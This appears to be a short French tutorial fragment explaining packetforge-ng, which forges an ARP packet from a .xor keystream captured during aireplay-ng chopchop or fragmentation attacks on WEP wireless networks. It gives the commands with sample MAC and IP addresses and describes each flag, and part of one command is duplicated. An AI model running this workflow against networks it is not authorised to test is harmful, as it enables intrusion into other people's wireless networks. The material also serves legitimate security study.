Utiliser packetforge avec aireplay -4 packetforge-ng -0 -a --MAC-- -h --MAC-- -k 192.168.0.3 -l 192.168.0.1 -y replay_dec-0723-205832.xor -w replay-pak 192.168.0.3 -l 192.168.0.1 -y replay_dec-0723-205832.xor -w replay-pak Wrote packet to: replay-pak packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap -a et -h sont les memes paramètres que ceux utilisés sous aireplay-ng, lors des attaques chopchop et fragmentation -k ip de destination (wireshark pour savoir) -l ip source -y correspond à notre fichier .xor (keystream) -w arp.cap signifie que le paquet forgé sera sauvegardé dans un fichier nommé arp.cap